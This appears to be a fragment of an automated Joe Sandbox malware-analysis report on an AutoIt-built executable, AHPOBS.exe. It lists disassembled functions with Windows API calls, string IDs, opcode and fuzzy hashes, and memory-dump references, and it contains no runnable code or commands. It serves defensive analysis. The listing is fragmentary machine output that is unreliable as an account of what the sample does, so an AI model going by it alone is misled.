                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                      • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                      • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                      • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                      Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: htonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 3832099526-2422070025
                                      • Opcode ID: 336bf04b74032a76dffc0b3dec239f3a33009b0f842574d7a0c0b2a9c387c113
                                      • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                      • Opcode Fuzzy Hash: 336bf04b74032a76dffc0b3dec239f3a33009b0f842574d7a0c0b2a9c387c113
                                      • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                      Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID: <local>
                                      • API String ID: 2038078732-4266983199
                                      • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                      • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                      • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                      • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                      Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock_memmove
                                      • String ID: EA06
                                      • API String ID: 1988441806-3962188686
                                      • Opcode ID: 24569dc5cb1a7ad9c060fa553b036e472b1e882c473ac0d65276195ad808a589
                                      • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                      • Opcode Fuzzy Hash: 24569dc5cb1a7ad9c060fa553b036e472b1e882c473ac0d65276195ad808a589
                                      • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                      Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • wsprintfW.USER32 ref: 0045612A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend_mallocwsprintf
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 1262938277-328681919
                                      • Opcode ID: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
                                      • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                      • Opcode Fuzzy Hash: 2f94ef12d061241edb9979ef4b8dfec1a2b2b476f2643c079f431c0c1a0d2850
                                      • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                      Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetCloseHandle.WININET(?), ref: 00442663
                                      • InternetCloseHandle.WININET ref: 00442668
                                        • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CloseHandleInternet$ObjectSingleWait
                                      • String ID: aeB
                                      • API String ID: 857135153-906807131
                                      • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                      • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                      • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                      • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                      Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcsncpy
                                      • String ID: ^B$C:\Users\user\AppData\Local\Temp\AHPOBS.exe
                                      • API String ID: 1735881322-4245338930
                                      • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                      • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                      • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                      • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                      Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                        • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Message_doexit
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 1993061046-4017498283
                                      • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                      • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                      • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                      • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D